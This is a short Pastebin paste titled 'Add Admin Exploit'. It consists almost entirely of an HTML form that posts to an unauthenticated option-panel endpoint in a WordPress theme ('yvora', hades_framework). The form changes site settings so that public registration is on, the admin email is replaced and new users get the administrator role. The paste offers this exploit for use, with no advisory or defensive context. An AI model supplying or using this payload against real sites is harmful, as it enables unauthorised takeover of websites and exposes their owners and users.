Xyb3r-D3vil

Add Admin Exploit

Jan 31st, 2016
693
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. Exploit :
  2.  
  3. <form action="http://site.com/wp-content/themes/yvora/hades_framework/option_panel/ajax.php" method="POST">
  4. <input name="values[0][name]" value="users_can_register">
  5. <input name="values[0][value]" value="1">
  6. <input name="values[1][name]" value="admin_email">
  7. <input name="values[1][value]" value="Your Email here">
  8. <input name="values[2][name]" value="default_role">
  9. <input name="values[2][value]" value="administrator">
  10. <input name="action" value="save">
  11. <input type="submit" value="Submit">
  12. </form>
Add Comment
Please, Sign In to add comment